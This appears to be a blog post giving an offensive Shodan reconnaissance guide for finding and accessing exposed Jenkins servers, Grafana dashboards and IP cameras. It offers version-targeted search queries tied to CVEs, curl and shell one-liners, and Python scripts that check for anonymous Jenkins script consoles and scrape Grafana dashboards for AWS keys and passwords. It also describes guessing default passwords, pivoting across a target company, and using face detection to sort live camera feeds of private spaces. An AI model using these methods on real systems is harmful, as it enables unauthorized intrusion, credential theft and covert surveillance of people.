Shodan stopped being a novelty around 2014. In 2026 it is infrastructure. While everyone was busy building AI guardrails and compliance dashboards, they left the backdoors open, the build servers unauthenticated, the Grafana instances with default admin, and the cameras still broadcasting to anyone who knows how to ask.
I have been crawling this stuff since I was young, taught myself because I wanted to build text-based games and needed the backend, but then did some hacking into my school to change friends' grades. The pattern never changes. Companies ship, they scale, they forget. Shodan remembers.
This is not a listicle. This is how you actually find the things that still matter.
The Landscape In 2026
Three things shifted. First, Shodan now indexes over 3.4 million cameras alone, and that is just the ones that say "camera" in the banner. Second, CI/CD sprawl means every startup has three Jenkins instances they spun up in 2022 and never patched. Third, observability became mandatory, so Grafana is everywhere, often internet-facing because someone wanted to check metrics from home.
The filters that work now are boring and precise. product, http.title, http.favicon.hash, ssl, org. The magic is in combining them with what vendors forgot to hide.
Jenkins: the build server that builds you a shell
Jenkins is still the crown jewel because it executes code by design. In April 2025 someone found a Jenkins on Shodan with a reverse shell already waiting. In 2026 we have fresh CVEs: CVE-2026-27099 is a stored XSS in the "Mark temporarily offline" field that lets you hijack sessions if you have agent configure permissions. CVE-2026-27100 leaks build info. None of this matters if you cannot find the box.
The dork that still returns clean hits:
"X-Jenkins" "Set-Cookie: JSESSIONID" http.title:"Dashboard"
That query was pulling 1,583 results last time the list refreshed. It works because Jenkins sends the X-Jenkins header, version string included, on every response it serves, even a 403, and the landing-page title rarely changes.
Do not stop there. Big Tech hides in plain sight using org filters. Intigriti's guide from last year still holds:
org:"target" product:jenkins
That syntax lets you scope to a single company. Replace target with Netflix, Shopify, whoever. You will find the dev instances they forgot to VPN.
For the CVE-2024-23897 args4j crowd, the ones that let you read /etc/passwd unauthenticated, you want older banners: weekly releases up to 2.441 and LTS up to 2.426.2. Over 45,000 unpatched instances were identified in the wild last year. Filter by version:
product:jenkins http.html:"2.4" country:US
That is noisy, since "2.4" also matches patched 2.4xx builds and any other "2.4" on the page. The X-Jenkins header carries the exact version string, so a banner search like "X-Jenkins: 2.42" narrows it; either way you verify the version per host before believing it.
Then look at what anonymous actually gets: a full dashboard, a job list, or a login form with no rate limit. The pages all look alike, and the screenshot Shodan took is usually enough to sort them.
When you land, do not click build immediately. Look for Script Console at /script. Look for credentials in environment variables. Look for the cloud agents that have IAM keys. Jenkins does not need an exploit if it is configured by an intern in 2021.
Grafana: dashboards full of secrets
Grafana went from niche to default. Every Kubernetes cluster ships with it. The problem is that people expose it to the internet with admin/admin and then connect it to Prometheus, Loki, and their cloud billing.
The simplest dork is almost insulting:
http.title:"grafana"
A researcher wrote it up last year as his starting point for LFI. It works because Grafana's default title is just "Grafana". For more precision:
title:"grafana" hostname:target
That was the exact line from the writeup.
In 2026 you want to hunt versions. CVE-2025-2703 was an XSS that lived from 11.1.0 until 11.6.0+security-01. Grafana embeds its version in the server-rendered page, and Shodan's http.html filter searches that body:
http.html:"Grafana v11." http.status:200
Or hunt plugins. The grafanacubism-panel before 0.1.2 had a zoom-link XSS. Find it:
http.html:"cubism" product:"grafana"
The real gold is not RCE, it is data. I have found AWS keys in dashboard variables, Snowflake passwords in data source configs, and internal Okta URLs that leak to unauthenticated viewers. Be precise about what the Viewer role can read: the /api/datasources listing needs org admin, and secureJsonData (passwords, keys) is never returned by the API at all. What an anonymous Viewer does get is /api/search, the full JSON of every dashboard (templating variables, hardcoded queries, links), and the ability to run queries against the connected backends through the data source proxy. Too many instances give Viewer to anonymous.
Filter for the open ones:
http.title:"Grafana" "login" -"Sign in"
The negative is meant to drop hosts that render a login form. It is noisy, because Grafana draws the login page client-side, so confirm each hit directly: /api/health answers without auth and gives the version, and /api/search returns 401 unless anonymous access is on. Dashboards loading without a prompt is the real tell.
For automation, chain it:
shodan search --fields ip_str,port,org 'product:"grafana" http.status:200' \
  | while IFS=$'\t' read -r ip port org; do curl -sk -m 5 "http://$ip:$port/api/health"; echo " $ip:$port ($org)"; done
Health returns version. Version maps to exploit.
Cameras: Big Tech forgot the physical layer
This is where the numbers get stupid. The auto-updating dork list tracked 3,425,376 results for just the word "camera". Hikvision alone is over 2.1 million.
Hikvision is the classic because of the old backdoor, the 2017 authentication bypass (CVE-2017-7921). The dork:
product:"Hikvision IP Camera"
Still works in 2026. You get login pages, many with default creds, many with firmware from 2019.
But the interesting stuff is not Hikvision. It is the long tail that facilities teams install and never patch.
IPCam Client:
title:"IPCam Client"
45,275 results last count. These are small business DVRs, often with no password.
GeoVision older webcams:
server: GeoHttpServer
39,278 results. The banner leaks model and sometimes credentials in the 401.
ContaCam:
title:"ContaCam"
30,053 results. Windows software that people expose directly.
Vivotek:
server: VVTK-HTTP-Server
22,490 results.
Avigilon, which is now Motorola, shows up as:
title:"Avigilon"
17,073 results. Those are enterprise, and when they are open they are usually in a parking garage or a lobby with no auth.
For the weird stuff, use screenshots. Shodan renders them:
webcam has_screenshot:true
90 results with live images. Add country filters to find traffic cams in your city.
DVRs on port 81:
200 ok dvr port:"81"
5,133 results. That port is a tell for cheap Chinese DVRs that multiplex cameras over HTTP.
Blue Iris, the software every home lab uses:
title:"ui3 -"
801 results for the HTML5 interface. Or:
title:"blue iris remote view"
12 results. Small numbers mean high signal. Those 12 are probably someone's house.
These are a different kind of find. Not data center gear but hallway cameras, storage rooms at 3am, feeds with audio where you can hear people talking in the background. That is someone's life, not someone's infrastructure.
Chaining: how you go from dork to access
Finding is step one. The part that matters is what you do next.
For Jenkins, once you have IPs, check for the script console anonymously. Curl:
curl -s -o /dev/null -w '%{http_code}\n' http://IP:8080/script
Do not follow redirects here: a 302 to /login counts as closed, and so does a 403. A genuine 200 that carries the script textarea means anonymous Groovy execution. If 403, try the CLI over WebSocket. The 2026 advisory warned about DNS rebinding via the WebSocket CLI, which means you can sometimes reach it through a browser on the inside.
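Putting the version check and the /script check together, as an added example that is not the author's tooling: the block reads the X-Jenkins header, compares it against the fixed releases for CVE-2024-23897 (2.442 weekly, 2.426.3 LTS), and treats /script as open only on a genuine 200 that carries the console textarea, without following a redirect to /login. The probe helper and the assumed target form (http://host:8080) are mine; the classification is kept separate from the network so it can be checked offline.

```python
import re
import urllib.error
import urllib.request
from typing import Optional

# CVE-2024-23897 (args4j '@file' read through the CLI) affects weekly
# releases up to 2.441 and LTS up to 2.426.2; fixed in 2.442 and 2.426.3.
WEEKLY_FIXED = (2, 442)
LTS_FIXED = (2, 426, 3)


def parse_version(x_jenkins: str):
    """'2.426.2' -> (2, 426, 2); '2.441' -> (2, 441); garbage -> None."""
    m = re.match(r"\s*(\d+)\.(\d+)(?:\.(\d+))?", x_jenkins or "")
    if not m:
        return None
    return tuple(int(g) for g in m.groups() if g is not None)


def affected_by_cve_2024_23897(version) -> bool:
    if version is None:
        return False
    if len(version) >= 3:            # LTS builds carry three components
        return version[:3] < LTS_FIXED
    return version[:2] < WEEKLY_FIXED


def triage(headers: dict, script_status: Optional[int], script_body: str = "") -> dict:
    """Classify one host from what the two requests returned (no network here)."""
    x_jenkins = next((v for k, v in headers.items() if k.lower() == "x-jenkins"), None)
    version = parse_version(x_jenkins) if x_jenkins else None
    return {
        "is_jenkins": x_jenkins is not None,
        "version": x_jenkins,
        "cve_2024_23897_candidate": affected_by_cve_2024_23897(version),
        # Only a real 200 with the console's textarea counts; a 302 to /login
        # or a 403 means anonymous has no RunScripts permission.
        "script_console_anonymous": script_status == 200 and 'name="script"' in script_body,
    }


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # surface 30x as HTTPError instead of following it


def _get(url: str, timeout: float):
    opener = urllib.request.build_opener(_NoRedirect())
    try:
        with opener.open(url, timeout=timeout) as r:
            return r.status, dict(r.headers), r.read(65536).decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, dict(e.headers), ""


def probe(base_url: str, timeout: float = 8.0) -> dict:
    """Two requests per host: '/' for the X-Jenkins header, '/script' for the console."""
    base = base_url.rstrip("/")
    _, headers, _ = _get(base + "/", timeout)
    status, _, body = _get(base + "/script", timeout)
    return triage(headers, status, body)


if __name__ == "__main__":
    import sys
    for target in sys.argv[1:]:          # e.g. http://203.0.113.5:8080 (documentation range)
        print(target, probe(target))
```

Feed it the ip:port pairs from the Shodan CLI and keep the hosts where the version is a candidate; a candidate still has to be confirmed against the CLI itself, since the header does not tell you whether the CLI is disabled.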
For Grafana, hit /api/org/users. That endpoint needs org admin, so JSON without auth means anonymous has been handed the Admin role; otherwise /api/search tells you whether anonymous is at least Viewer. Enumerate users, then try default passwords. The SonarQube report on CVE-2025-2703 noted authenticated XSS, but auth is often admin:admin.
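Here is the Grafana side of that chain as one script, added here rather than taken from the page: /api/health for the version (it never needs auth), /api/search and /api/org/users to tell whether anonymous is none, Viewer or Admin, and a walk over every dashboard's JSON for secret-looking strings, which is where the keys in dashboard variables actually live. The regexes, the probe helper and the sample dashboard are my assumptions; the sample's key is AWS's documented example id, not a live credential.

```python
import json
import re
import urllib.error
import urllib.request

# Patterns for the kind of material that ends up pasted into dashboard JSON.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "github_pat": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "password_assignment": re.compile(r"(?i)\b(?:password|passwd|secret)\b\s*[=:]\s*['\"]?[^\s'\"]+"),
}


def grafana_version(health_body: str):
    """/api/health needs no auth; body is {"commit":..,"database":..,"version":..}."""
    try:
        return json.loads(health_body).get("version")
    except (ValueError, AttributeError):
        return None


def anonymous_role(search_status, org_users_status) -> str:
    """/api/search needs Viewer, /api/org/users needs org Admin; both answer
    401 when auth is required, so two status codes classify the host."""
    if org_users_status == 200:
        return "Admin"
    if search_status == 200:
        return "Viewer"
    if search_status in (401, 403):
        return "none"
    return "unknown"


def _strings(obj, path=""):
    """Yield (json_path, string) for every string value in a nested document."""
    if isinstance(obj, dict):
        for k, v in obj.items():
            yield from _strings(v, f"{path}.{k}")
    elif isinstance(obj, list):
        for i, v in enumerate(obj):
            yield from _strings(v, f"{path}[{i}]")
    elif isinstance(obj, str):
        yield path, obj


def scan_dashboard(dashboard_json: dict) -> list:
    """Walk a /api/dashboards/uid/<uid> response: templating variables,
    panel queries, links, annotations, anything that is a string."""
    hits = []
    for path, text in _strings(dashboard_json):
        for kind, pat in SECRET_PATTERNS.items():
            for m in pat.finditer(text):
                hits.append({"path": path, "kind": kind, "match": m.group(0)})
    return hits


def _get(url, timeout=8.0):
    try:
        with urllib.request.urlopen(url, timeout=timeout) as r:
            return r.status, r.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, ""


def probe(base_url: str) -> dict:
    base = base_url.rstrip("/")
    _, health = _get(base + "/api/health")
    search_status, search_body = _get(base + "/api/search?type=dash-db")
    org_status, _ = _get(base + "/api/org/users")
    findings = []
    if search_status == 200:                      # anonymous is at least Viewer
        for d in json.loads(search_body):
            _, body = _get(f"{base}/api/dashboards/uid/{d['uid']}")
            if body:
                findings.extend(scan_dashboard(json.loads(body)))
    return {"version": grafana_version(health),
            "anonymous": anonymous_role(search_status, org_status),
            "findings": findings}


# Constructed sample of a dashboard export; the AWS id is the one from AWS's
# own documentation and the PAT is a dummy of the right shape.
SAMPLE_DASHBOARD = {"dashboard": {"title": "billing", "templating": {"list": [
    {"name": "region", "type": "custom", "query": "us-east-1,eu-west-1",
     "current": {"value": "us-east-1"}},
    {"name": "aws_key", "type": "constant", "query": "AKIAIOSFODNN7EXAMPLE",
     "current": {"value": "AKIAIOSFODNN7EXAMPLE"}}]},
    "panels": [{"title": "cost", "targets": [
        {"rawSql": "select * from cost where token='ghp_" + "a" * 36 + "'"}]}]}}

if __name__ == "__main__":
    import sys
    if sys.argv[1:]:                               # e.g. http://203.0.113.7:3000
        print(json.dumps(probe(sys.argv[1]), indent=2))
    else:
        print(json.dumps(scan_dashboard(SAMPLE_DASHBOARD), indent=2))
```

The version string from /api/health is what you map against the CVE ranges above; the scan is deliberately broad, because a constant-type variable is the usual hiding place but people also hardcode credentials into panel queries and data links.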
For cameras, automate with Shodan CLI and ffmpeg. Grab a screenshot, run face detection, discard parking lots, keep lobbies. The Trend Micro analysis showed Houston and San Jose have the most exposed assets, so start there if you want density.
Use favicon hashes to find clones. Jenkins has a consistent favicon. Grafana's is hash 848442153. Search:
http.favicon.hash:848442153
That finds Grafana even when they rename the title.
Why Big Tech still forgets
It is not malice. It is sprawl. A team spins up Jenkins for a hackathon in 2023, puts it on a public subnet because VPC peering was slow, adds a DNS record, forgets it. Two years later Shodan indexes it, the certificate renews via Let's Encrypt, and it looks legitimate.
Same with Grafana. Observability vendors push "share your dashboard" features. Engineers enable anonymous access to show a client a graph. They never disable it.
Cameras are worse because facilities is not IT. The camera installer opens port 80 to "test remotely" and leaves it. The building gets sold, the IP stays.
The auto-updating dork list I pulled from updates every six hours and removes dead queries. That is the pace you are fighting. Things appear and disappear constantly.
A working methodology for 2026
Do not collect dorks. Build a pipeline.
1. Start with org. Pick a target. Use product filters for Jenkins, Grafana, and camera vendors.
2. Enrich with Shodan's vuln tag. Shodan now tags CVE-2024-23897 and others. Search `vuln:CVE-2024-23897 product:jenkins`.
3. Filter by last seen. Shodan's date filters are `after:` and `before:` in dd/mm/yyyy form, so `after:01/03/2026` keeps only hosts seen since that date.
4. Screenshot everything. Shodan's has_screenshot is gold for cameras and login pages.
5. Correlate. If you find Jenkins and Grafana on the same /24, it is probably the same company. Pivot.
The dorks that pay rent right now:
Jenkins unauth dashboard: `"X-Jenkins" "Set-Cookie: JSESSIONID" http.title:"Dashboard"`
Grafana open: `http.title:"grafana"`
Hikvision: `product:"Hikvision IP Camera"`
IPCam: `title:"IPCam Client"`
GeoVision: `server: GeoHttpServer`
Blue Iris UI3: `title:"ui3 -"`
Combine with country, org, asn. The magic is never the dork alone. It is the context.
Closing Remarks
Shodan is not hacking. It is looking. Big Tech forgot to close the blinds. Jenkins still builds, Grafana still graphs, cameras still watch empty hallways at 2am.
In 2026 the internet is larger but not smarter. The same headers, the same default titles, the same human error. The dorks above are not theoretical. They returned millions of results last week. The Jenkins XSS from February is still unpatched on hundreds of hosts. The Grafana plugin XSS is still in the wild. The cameras still stream.
Write your own tooling. Store results. Diff daily. The moment something new appears with product:jenkins and no auth, you want to be first.
Godspeed.